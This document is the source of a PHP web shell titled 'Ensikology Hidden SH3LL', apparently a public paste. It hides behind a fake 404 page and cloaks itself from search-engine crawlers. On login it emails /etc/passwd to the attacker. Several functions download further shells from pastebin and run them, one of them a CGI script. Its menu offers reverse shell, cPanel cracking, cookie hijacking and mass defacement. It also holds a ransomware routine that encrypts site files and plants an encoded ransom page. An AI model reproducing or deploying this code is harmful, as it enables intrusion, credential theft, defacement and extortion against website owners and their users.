
Hidden SH3LL

Mar 17th, 2019
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  1. <?php
  2. @session_start();
  3. @ini_set('max_execution_time', 0);
  4. @ini_set('memory_limit', '999999999M');
  5. @set_time_limit(0);
  6. @ini_restore("safe_mode_include_dir");
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  14. function Zip($source, $destination) {
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  25. RecursiveDirectoryIterator($source),
  26. RecursiveIteratorIterator::SELF_FIRST);
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  29. if(is_dir($file) == true) {
  30. $zip->addEmptyDir(str_replace($source . '/', '', $file
  31. .
  32. '/'));
  33. } else if(is_file($file) == true) {
  34. $zip->addFromString(str_replace($source . '/', '',
  35. $file), file_get_contents($file));
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  39. $zip->addFromString(basename($source),
  40. file_get_contents($source));
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  42. return $zip->close();
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  47. ".zip";
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  49. $filez = file_get_contents($dst);
  50. header("Content-type: application/octet-stream");
  51. header("Content-length: " . strlen($filez));
  52. header("Content-disposition: attachment;
  53. filename=\"" . basename($dst) . "\";");
  54. echo $filez;
  55. }
  56. exit;
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  61. "Google",
  62. "Slurp",
  63. "MSNBot",
  64. "ia_archiver",
  65. "Yandex",
  66. "Rambler"
  67. );
  68. if(preg_match('/' . implode('|', $userAgents) . '/i',
  70. header('HTTP/1.0 404 Not Found');
  71. exit;
  72. }
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  333. @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0;
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  336. </style>
  337. <div id=divAlert></div>";
  338. if($_COOKIE["user"] != $username &&
  339. $_COOKIE["pass"] != md5($password)) {
  340. if($_POST["usrname"] == $username &&
  341. $_POST["passwrd"] == $password) {
  342. print '<script>document.cookie="user=' .
  343. $_POST["usrname"] . ';";document.cookie="pass=' .
  344. md5($_POST["passwrd"]) . ';";</script>';
  345. if($email != "") {
  346. mail_alert();
  347. }
  348. } else {
  349. if($_POST['usrname']) {
  350. print '<script>alert("Wrong Username or
  351. password");</script>';
  352. }
  353. echo '
  354. <h1>Not Found</h1>
  355. <p>The requested URL was not found on this server.</p><hr>
  356. <form method=post>
  358. <input class="hidden" type="password"
  359. size="30" name="passwrd" value=""
  360. onfocus="if (this.value == \'password\')
  361. this.value = \'\';">
  362. <input type="hidden" name="action"
  363. value="login">
  364. <input type="hidden" name="hide"
  365. value="">
  366. <input type="hidden" size="30"
  367. name="usrname" value="RaBiitch" onfocus="if
  368. (this.value == \'username\'){this.value = \'\';}">
  369. </form>';
  370. exit;
  371. }
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  389. $ox = "Linux";
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  391. $self = $_SERVER['PHP_SELF'];
  392. $srvr_sof = $_SERVER['SERVER_SOFTWARE'];
  393. $your_ip = $_SERVER['REMOTE_ADDR'];
  394. $srvr_ip = $_SERVER['SERVER_ADDR'];
  395. $admin = $_SERVER['SERVER_ADMIN'];
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  400. echo ini_get(\"safe_mode\");
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  402. include(\$_GET[\"file\"]);
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  405. echo ini_get(\"safe_mode\");
  406. echo ini_get(\"open_basedir\");
  407. include(\$_GET[\"ss\"]);
  408. ?>";
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  432. "rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  433. if($safemode == "On") {
  434. echo "<div id='alert'><a
  435. class=\"alert_yellow\"
  436. href=\"#alert\">Safe Mode : <font
  437. color=red>ON</font></a></div>";
  438. } else {
  439. echo "<div id='alert'><a
  440. class=\"alert_yellow\"
  441. href=\"#alert\">Safe Mode : <font
  442. color=lime>OFF</font></a></div>";
  443. }
  444. echo "<script
  445. src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  446. echo "<title>Ensikology Hidden SH3LL</title>
  447. <link href='http://fonts.googleapis.com/css?family=Iceland'
  448. rel='stylesheet' type='text/css'>
  449. <body bgcolor=black>
  450. <div id=result>
  451. <table>
  452. <tbody>
  453. <tr>
  454. <td style='border-right:1px solid #104E8B;'
  455. width=\"300px;\">
  456. <div style='text-align:center;'>
  457. <a href='?' style='text-decoration:none;'>
  458. <pre onkeydown=return false; onmousedown=return false; class=kedip
  459. style='color:lime;'>
  462. </pre>
  463. </a><font
  464. color=yellow>=========== BlackHell Team ===========</font>
  465. </div></td>
  466. <td>
  467. <div class=\"header\">OS</font>
  468. <font color=\"#666\" >:</font>
  469. " . $ox . " </font> <font color=\"#666\"
  470. >|</font>
  471. " . php_uname() . "<br>
  472. Your IP : <font color=red>" . $your_ip . "</font>
  473. <font color=\"#666\" >|</font>
  474. Server IP : <font color=red>" . $srvr_ip . "</font>
  475. <font color=\"#666\" > | </font>
  476. Admin <font color=\"#666\" > : </font>
  477. <font color=red> {$admin} </font><br>MySQL <font
  478. color=\"#666\" > : </font>";
  479. echo mysqlx();
  480. echo "<font color=\"#666\" > |
  481. </font> Oracle <font color=\"#666\" > :
  482. </font>";
  483. echo oraclesx();
  484. echo "<font color=\"#666\" > |
  485. </font> MSSQL <font color=\"#666\" > :
  486. </font>";
  487. echo mssqlx();
  488. echo "<font color=\"#666\" > |
  489. </font> PostGreySQL <font color=\"#666\" > :
  490. </font>";
  491. echo postgreyx();
  492. echo "<br />cURL <font color=\"#666\"
  493. > : </font>";
  494. echo curlx();
  495. echo "<font color=\"#666\" > |
  496. </font>Total Space<font color=\"#666\" > :
  497. </font>";
  498. echo disc_size();
  499. echo "<font color=\"#666\" > |
  500. </font>Free Space<font color=\"#666\" > :
  501. </font>";
  502. echo freesize();
  503. echo "<br />Software<font
  504. color=\"#666\" > : </font><font
  505. color=red>{$srvr_sof}</font>
  506. <font color=\"#666\">
  507. | </font> PHP<font color=\"#666\" > :
  508. </font><a style='color:red; text-decoration:none;' target=_blank
  509. href=?phpinfo>" . phpversion() . "</a>
  510. <br />Disabled Functions<font
  511. color=\"#666\"
  512. > : </font></font><font color=red>";
  513. echo disabled_functns() . "</font><br />";
  514. if($os == 'win') {
  515. echo "Drives <font color=\"#666\" > :
  516. </font>";
  517. echo drivesx();
  518. } else {
  519. echo "r00t Exploit
  520. <font color=\"#666\" > : </font>
  521. <font color=red>";
  522. echo r00t_exploit() . "</font>";
  523. }
  524. echo "
  525. </div>
  526. </td>
  527. </tr>
  528. </tbody>
  529. </table></div>";
  530. echo "
  531. <div class='menubar'>
  532. <div id=\"meunlist\" align=center>
  533. <ul>
  534. <li>[<a href=\"?ngindex\">Priv
  535. Index</a>]</li>
  536. <li>[<a href=\"?cgi\">CGI
  537. Telnet</a>]</li>
  538. <li>[<a href=\"?rs\">Reverse
  539. Shell</a>]</li>
  540. <li>[<a href=\"?mini2\">Mini Shell
  541. 2</a>]</li>
  542. <li>[<a
  543. href=\"?idx\">IndoXploit</a>]</li>
  544. </ul><ul>
  545. <li>[<a href=\"?musik\">Sound
  546. Cloud</a>]</li>
  547. <li>[<a href=\"?rctm\">Realtime DDOS
  548. Map</a>]</li>
  549. <li>[<a
  550. href=\"?encodefile\">Encode/Decode</a>]</li>
  551. <li>[<a href=\"?path={$path}&amp;safe_mod\">Safe
  552. Mode Fucker</a>]</li>
  553. <li>[<a href=\"?path={$path}&amp;forbd_dir\">Dir
  554. Listing Forbidden</a>]</li>
  555. </ul><ul>
  556. <li>[<a href=\"?massmailer\">Mass
  557. Mailer</a>]</li>
  558. <li>[<a href=\"?cpanel_crack\">cPanel
  559. Crack</a>]</li>
  560. <li>[<a href=\"?sh311_scanner\">Backdoor
  561. Scan</a>]</li>
  562. <li>[<a href=\"?server_exploit_details\">Exploit
  563. Details</a>]</li>
  564. <li>[<a href=\"?remote_server_scan\">Remote Server
  565. Scan</a>]</li>
  566. </ul><ul>
  567. <li>[<a href=\"?remotefiledown\">Remote File
  568. Downloader</a>]</li>
  569. <li>[<a href=\"?hexenc\">Hex
  570. Encode/Decode</a>]</li>
  571. <li>[<a href=\"?ftp_anon_scan\">FTP Anonymous Access
  572. Scaner</a>]</li>
  573. <li>[<a
  574. href=\"?path={$path}&amp;mass_xploit\">Mass
  575. Deface</a>]</li>
  576. <li>[<a href=\"?config_grab\">Config
  577. Grabber</a>]</li>
  578. </ul><ul>
  579. <li>[<a
  580. href=\"?symlink\">SymLink</a>]</li>
  581. <li>[<a href=\"?cookiejack\">Cookie
  582. Hijack</a>]</li>
  583. <li>[<a href=\"?sshman\">Secure
  584. Shell</a>]</li>
  585. <li>[<a href=\"?path={$path}&c0de_inject\">Mass
  586. Overwrite</a>]</li>
  587. <li>[<a href=\"?ftpman\">FTP
  588. Manager</a>]</li>
  589. </ul><ul>
  590. <li>[<a
  591. href=\"?ganteng\">Ransomeware</a>]</li>
  592. <li>[<a href=\"?logger\">Check
  593. Steganologer</a>]</li>
  594. <li>[<a
  595. href=\"?adminer\">Adminer</a>]</li>
  596. <li>[<a href=\"?phpinfo\">PHP
  597. Info</a>]</li>
  598. <li>[<a href=\"?terjemah\">Byksw
  599. Translate</a>]</li>
  600. <li>[<li class=kedip><a
  601. href=\"?killme\"><font
  602. color='#008080'>Suicide</font></a></li>]</li>
  603. </ul>
  604. </div>
  605. </div>";
  606. function alert($alert_txt) {
  607. echo "<div id=divAlert>" . $alert_txt .
  608. "</div>";
  609. echo "<script>alert('" . $alert_txt .
  610. "');window.location.href='?';</script>";
  611. }
  612. function disabled_functns() {
  613. if(!@ini_get('disable_functions')) {
  614. echo "None";
  615. } else {
  616. echo @ini_get('disable_functions');
  617. }
  618. }
  619. function drivesx() {
  620. foreach(range('A', 'Z') as $drive) {
  621. if(is_dir($drive . ':\\')) {
  622. echo "<a> [<a style='color:aqua;
  623. text-decoration:none;' href='?path=" . $drive . ":\\'> "
  624. . $drive . " </a>] </a>";
  625. }
  626. }
  627. }
  628. function mail_alert() {
  629. global $email;
  630. $passwd = file_get_contents('/etc/passwd');
  631. $shell_path = "http://" . $_SERVER['SERVER_NAME'] .
  633. $subject = "Logs";
  634. $from = "From:RaBiitch";
  635. $content_mail = "URL : $shell_path\nIP : " .
  636. $_SERVER['REMOTE_ADDR'] . "\n**********\n$passwd\n**********\nBlackHell Team";
  637. mail($email, $subject, $content_mail, $from);
  638. }
  639. function filesizex($size) {
  640. if($size >= 1073741824)
  641. $size = round(($size / 1073741824), 2) . " GB";
  642. elseif($size >= 1048576)
  643. $size = round(($size / 1048576), 2) . " MB";
  644. elseif($size >= 1024)
  645. $size = round(($size / 1024), 2) . " KB";
  646. else
  647. $size .= " B";
  648. return $size;
  649. }
  650. function disc_size() {
  651. echo filesizex(disk_total_space("/"));
  652. }
  653. function freesize() {
  654. echo filesizex(disk_free_space("/"));
  655. }
  656. function file_perm($filz) {
  657. if($m = fileperms($filz)) {
  658. $p = '';
  659. $p .= ($m & 00400) ? 'r' : '-';
  660. $p .= ($m & 00200) ? 'w' : '-';
  661. $p .= ($m & 00100) ? 'x' : '-';
  662. $p .= ($m & 00040) ? 'r' : '-';
  663. $p .= ($m & 00020) ? 'w' : '-';
  664. $p .= ($m & 00010) ? 'x' : '-';
  665. $p .= ($m & 00004) ? 'r' : '-';
  666. $p .= ($m & 00002) ? 'w' : '-';
  667. $p .= ($m & 00001) ? 'x' : '-';
  668. return $p;
  669. }
  670. }
  671. function mysqlx() {
  672. if(function_exists('mysql_connect')) {
  673. echo "<font color='aqua'>Enabled</font>";
  674. } else {
  675. echo "<font
  676. color='#008080'>Disabled</font>";
  677. }
  678. }
  679. function oraclesx() {
  680. if(function_exists('oci_connect')) {
  681. echo "<font color='aqua'>Enabled</font>";
  682. } else {
  683. echo "<font
  684. color='#008080'>Disabled</font>";
  685. }
  686. }
  687. function mssqlx() {
  688. if(function_exists('mssql_connect')) {
  689. echo "<font color='aqua'>Enabled</font>";
  690. } else {
  691. echo "<font
  692. color='#008080'>Disabled</font>";
  693. }
  694. }
  695. function postgreyx() {
  696. if(function_exists('pg_connect')) {
  697. echo "<font color='aqua'>Enabled</font>";
  698. } else {
  699. echo "<font
  700. color='#008080'>Disabled</font>";
  701. }
  702. }
  703. function strip($filx) {
  704. if(!get_magic_quotes_gpc())
  705. return trim(urldecode($filx));
  706. return trim(urldecode(stripslashes($filx)));
  707. }
  708. function curlx() {
  709. if(function_exists('curl_version')) {
  710. echo "<font color='aqua'>Enabled</font>";
  711. } else {
  712. echo "<font
  713. color='#008080'>Disabled</font>";
  714. }
  715. }
  716. function filesize_x($filex) {
  717. $f_size = filesizex(filesize($filex));
  718. return $f_size;
  719. }
  720. function rename_ui() {
  721. $rf_path = $_GET['rename'];
  722. echo "<div id=result>
  723. <center><h2>Rename</h2><hr><p><br><br>
  724. <form method='GET'><input type=hidden name='old_name' size='40'
  725. value=" . $rf_path . ">New Name : <input name='new_name'
  726. size='40' value=" . basename($rf_path) . ">
  727. <input type='submit'
  728. value='submit'></form></p><br><br><hr><br><br></center></div>";
  729. }
  730. function terjemah() {
  731. echo '
  732. <center>
  733. <form method="post">
  734. <textarea style="width: 670px; height: 243px;"
  735. name="text"></textarea><br />
  736. <input type="submit" name="submit"
  737. value="terjemah" />
  738. </form>
  739. <textarea style="width: 670px; height: 243px;"
  740. readonly>';
  741. if($_POST["submit"] == "terjemah") {
  742. $text=$_POST["text"];
  743. $output=str_replace("e","w",$text);
  744. $output2=str_replace("o","w",$output);
  745. $output3=str_replace("a","w",$output2);
  746. $output4=str_replace("u","w",$output3);
  747. $output5=str_replace("i","y",$output4);
  748. // huruf gede
  749. $output6=str_replace("E","W",$output5);
  750. $output7=str_replace("O","W",$output6);
  751. $output8=str_replace("A","W",$output7);
  752. $output9=str_replace("U","W",$output8);
  753. $output10=str_replace("I","Y",$output9);
  754. echo $output10;
  755. }
  756. echo "</textarea></center>";
  757. }
  758. function cgi() {
  759. if(!file_exists('tools_ensikology')) {
  760. mkdir('tools_ensikology', 0755);
  761. }
  762. $file_cgi = "tools_ensikology/cgi.izo";
  763. $isi_htcgi = "
  764. AddHandler cgi-script .izo
  765. Options -Indexes";
  766. $htcgi = fopen("tools_ensikology/.htaccess", "w+");
  767. $cgi_script =
  768. file_get_contents("https://pastebin.com/raw/MUD0EPjb");
  769. $cgi = fopen($file_cgi, "w+");
  770. fwrite($cgi, $cgi_script);
  771. fwrite($htcgi, $isi_htcgi);
  772. chmod($file_cgi, 0755);
  773. echo "<iframe src='tools_ensikology/cgi.izo' width='100%' height='100%'
  774. frameborder='0' scrolling='no'></iframe>";
  775. }
  776. function rctm() {
  777. echo "<iframe width='100%' height='100%'
  778. src='https://threatmap.fortiguard.com' frameborder='0'>";
  779. }
  780. function soundcloud() {
  781. echo "<iframe width='100%' height='100%' scrolling='no'
  782. frameborder='no'
  783. src='https://w.soundcloud.com/player/?url=https://api.soundcloud.com/playlists/355874911&amp;color=#00cc11&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false&amp;show_teaser=true&amp;visual=true'></iframe>";
  784. }
  785. function gantengware() {
  786. echo "
  787. <style type='text/css'>
  788. body {
  789. background: #1A1C1F;
  790. color: #e2e2e2;
  791. }
  792. .inpute{
  793. border-style: dotted;
  794. border-color: #379600;
  795. background-color: transparent;
  796. color: white;
  797. text-align: center;
  798. }
  799. .selecte{
  800. border-style: dotted;
  801. border-color: green;
  802. background-color: transparent;
  803. color: green;
  804. }
  805. .submite{
  806. border-style: dotted;
  807. border-color: #4CAF50;
  808. background-color: transparent;
  809. color: white;
  810. }
  811. .result{
  812. text-align: left;
  813. }
  814. </style>
  815. <link rel='stylesheet' type='text/css'
  816. href='https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css'>
  817. </head>
  818. <body>
  819. <div class='result'>";
  820. error_reporting(0);
  821. set_time_limit(0);
  822. ini_set('memory_limit', '-1');
  823. class deRanSomeware {
  824. public function shcpackInstall() {
  825. if(!file_exists(".htabak")) {
  826. rename(".htaccess", ".htabak");
  827. if(fwrite(fopen('.htaccess', 'w+'), "\rDirectoryIndex
  828. index.php\r\nErrorDocument 404 /index.php")) {
  829. echo '<i class="fa fa-thumbs-o-up"
  830. aria-hidden="true"></i> .htaccess (Default
  831. Page)<br>';
  832. }
  833. if(file_put_contents("index.php",
  834. gzinflate(base64_decode("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"))))
  835. {
  836. echo '<i class="fa fa-thumbs-o-up"
  837. aria-hidden="true"></i> index.php (Default
  838. Page)<br>';
  839. }
  840. }
  841. }
  842. public function shcpackUnstall() {
  843. if(file_exists(".htabak")) {
  844. if(unlink(".htaccess") &&
  845. unlink("index.php")) {
  846. echo '<i class="fa fa-thumbs-o-down"
  847. aria-hidden="true"></i> .htaccess (Default
  848. Page)<br>';
  849. echo '<i class="fa fa-thumbs-o-down"
  850. aria-hidden="true"></i> index.php (Default
  851. Page)<br>';
  852. }
  853. rename(".htabak", ".htaccess");
  854. }
  855. }
  856. public function plus() {
  857. flush();
  858. ob_flush();
  859. }
  860. public function locate() {
  861. return getcwd();
  862. }
  863. public function shcdirs($dir, $method, $key) {
  864. switch($method) {
  865. case '1':
  866. deRanSomeware::shcpackInstall();
  867. break;
  868. case '2':
  869. deRanSomeware::shcpackUnstall();
  870. break;
  871. }
  872. foreach(scandir($dir) as $d) {
  873. if($d != '.' && $d != '..') {
  874. $locate = $dir . DIRECTORY_SEPARATOR . $d;
  875. if(!is_dir($locate)) {
  876. if(deRanSomeware::kecuali($locate,
  877. "ini.php") && deRanSomeware::kecuali($locate,
  878. ".png") && deRanSomeware::kecuali($locate,
  879. ".htaccess") && deRanSomeware::kecuali($locate,
  880. "ini.php") && deRanSomeware::kecuali($locate,
  881. "index.php") && deRanSomeware::kecuali($locate,
  882. ".htabak")) {
  883. switch($method) {
  884. case '1':
  885. deRanSomeware::shcEnCry($key,
  886. $locate);
  887. deRanSomeware::shcEnDesDirS($locate,
  888. "1");
  889. break;
  890. case '2':
  891. deRanSomeware::shcDeCry($key,
  892. $locate);
  893. deRanSomeware::shcEnDesDirS($locate,
  894. "2");
  895. break;
  896. }
  897. }
  898. } else {
  899. deRanSomeware::shcdirs($locate, $method, $key);
  900. }
  901. }
  902. deRanSomeware::plus();
  903. }
  904. }
  905. public function shcEnDesDirS($locate, $method) {
  906. switch($method) {
  907. case '1':
  908. rename($locate, $locate . ".bak");
  909. break;
  910. case '2':
  911. $locates = str_replace(".bak", "",
  912. $locate);
  913. rename($locate, $locates);
  914. break;
  915. }
  916. }
  917. public function shcEnCry($key, $locate) {
  918. $data = file_get_contents($locate);
  919. $iv =
  920. mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),
  922. $encrypted = base64_encode($iv .
  923. mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash('sha256', $key, true), $data,
  924. MCRYPT_MODE_CBC, $iv));
  925. if(file_put_contents($locate, $encrypted)) {
  926. echo '<i class="fa fa-lock"
  927. aria-hidden="true"></i> <font
  928. color="#00BCD4">Locked</font> (<font
  929. color="#40CE08">Success</font>) <font
  930. color="#FF9800">|</font> <font
  931. color="#2196F3">' . $locate . '</font> <br>';
  932. } else {
  933. echo '<i class="fa fa-lock"
  934. aria-hidden="true"></i> <font
  935. color="#00BCD4">Locked</font> (<font
  936. color="red">Failed</font>) <font
  937. color="#FF9800">|</font> ' . $locate . ' <br>';
  938. }
  939. }
  940. public function shcDeCry($key, $locate) {
  941. $data = base64_decode(file_get_contents($locate));
  942. $iv = substr($data, 0,
  943. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  944. $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,
  945. hash('sha256', $key, true), substr($data,
  946. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
  948. $iv), "\0");
  949. if(file_put_contents($locate, $decrypted)) {
  950. echo '<i class="fa fa-unlock"
  951. aria-hidden="true"></i> <font
  952. color="#FFEB3B">Unlock</font> (<font
  953. color="#40CE08">Success</font>) <font
  954. color="#FF9800">|</font> <font
  955. color="#2196F3">' . $locate . '</font> <br>';
  956. } else {
  957. echo '<i class="fa fa-unlock"
  958. aria-hidden="true"></i> <font
  959. color="#FFEB3B">Unlock</font> (<font
  960. color="red">Failed</font>) <font
  961. color="#FF9800">|</font> <font
  962. color="#2196F3">' . $locate . '</font> <br>';
  963. }
  964. }
  965. public function kecuali($ext, $name) {
  966. $re = "/({$name})/";
  967. preg_match($re, $ext, $matches);
  968. if($matches[1]) {
  969. return false;
  970. }
  971. return true;
  972. }
  973. }
  974. if($_POST['submit']) {
  975. switch($_POST['method']) {
  976. case '1':
  977. deRanSomeware::shcdirs(deRanSomeware::locate(),
  978. "1", $_POST['key']);
  979. break;
  980. case '2':
  981. deRanSomeware::shcdirs(deRanSomeware::locate(),
  982. "2", $_POST['key']);
  983. break;
  984. }
  985. } else {
  986. echo "
  987. <form action='' method='post' style='text-align: center;'>
  988. <label>Key : </label>
  989. <input type='text' name='key' class='inpute' placeholder='KEY
  990. ENC/DEC'>
  991. <select name='method' class='selecte'>
  992. <option value='1'>1</option>
  993. <option value='2'>2</option>
  994. </select>
  995. <input type='submit' name='submit' class=':)'
  996. value='Submit'/>
  997. </form>";
  998. }
  999. echo "
  1000. </div>
  1001. </body>";
  1002. }
  1003. function idxshell() {
  1004. if(!file_exists('tools_ensikology')) {
  1005. mkdir('tools_ensikology', 0755);
  1006. }
  1007. $nama = fopen("tools_ensikology/idx.php", "w");
  1008. $file = file_get_contents('http://pastebin.com/raw.php?i=ZLLP0xmc');
  1009. fwrite($nama, $file);
  1010. chmod($nama, 0444);
  1011. fclose($nama);
  1012. }
  1013. function adminer() {
  1014. if(!file_exists('tools_ensikology')) {
  1015. mkdir('tools_ensikology', 0755);
  1016. }
  1017. $nama = fopen("tools_ensikology/adminer.php", "w+");
  1018. $file =
  1019. file_get_contents('https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php');
  1020. fwrite($nama, $file);
  1021. fclose($nama);
  1022. }
  1023. function mini2() {
  1024. if(!file_exists('tools_ensikology')) {
  1025. mkdir('tools_ensikology', 0755);
  1026. }
  1027. $nama = fopen("tools_ensikology/mini.php", "w+");
  1028. $file = file_get_contents('http://pastebin.com/raw.php?i=kFmhaXuq');
  1029. fwrite($nama, $file);
  1030. chmod($nama, 0444);
  1031. fclose($nama);
  1032. }
  1033. function ngindex() {
  1034. $nama = fopen("ensikology.php", "w+");
  1035. $file = file_get_contents('https://pastebin.com/raw/zCerqmzW');
  1036. fwrite($nama, $file);
  1037. chmod($nama, 0444);
  1038. fclose($nama);
  1039. }
  1040. function filemanager_bg() {
  1041. global $sep, $self;
  1042. $path = !empty($_GET['path']) ? $_GET['path'] : getcwd();
  1043. $dirs = array();
  1044. $fils = array();
  1045. if(is_dir($path)) {
  1046. chdir($path);
  1047. if($handle = opendir($path)) {
  1048. while(($item = readdir($handle)) !== FALSE) {
  1049. if($item == ".") {
  1050. continue;
  1051. }
  1052. if($item == "..") {
  1053. continue;
  1054. }
  1055. if(is_dir($item)) {
  1056. array_push($dirs, $path . $sep . $item);
  1057. } else {
  1058. array_push($fils, $path . $sep . $item);
  1059. }
  1060. }
  1061. } else {
  1062. alert("Access Denied for this operation");
  1063. }
  1064. } else {
  1065. alert("Directory Not Found!!!");
  1066. }
  1067. echo "
  1068. <div id=result>
  1069. <table class=table>
  1070. <tr>
  1071. <th width='500px'>Name</th>
  1072. <th width='100px'>Size</th>
  1073. <th width='100px'>Permissions</th>
  1074. <th width='500px'>Actions</th>
  1075. </tr>";
  1076. foreach($dirs as $dir) {
  1077. echo "<tr><td><a
  1078. href='{$self}?path={$dir}'>" . basename($dir) .
  1079. "</a></td>
  1080. <td>" . filesize_x($dir) . "</td>
  1081. <td><a href='{$self}?path={$path}&amp;perm={$dir}'>"
  1082. .
  1083. file_perm($dir) . "</a></td>
  1084. <td><a
  1085. href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> |
  1086. <a
  1087. href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a>
  1088. | <a href='{$self}?zip={$dir}'> Download
  1089. </a></td></tr>";
  1090. }
  1091. foreach($fils as $fil) {
  1092. echo "<tr><td><a
  1093. href='{$self}?path={$path}&amp;read={$fil}'>" . basename($fil)
  1094. . "</a></td>
  1095. <td>" . filesize_x($fil) . "</td>
  1096. <td><a
  1097. href='{$self}?path={$path}&amp;perm={$fil}'>" .
  1098. file_perm($fil)
  1099. . "</a></td>
  1100. <td><a
  1101. href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> |
  1102. <a
  1103. href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a>
  1104. | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a>
  1105. |
  1106. <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a> |
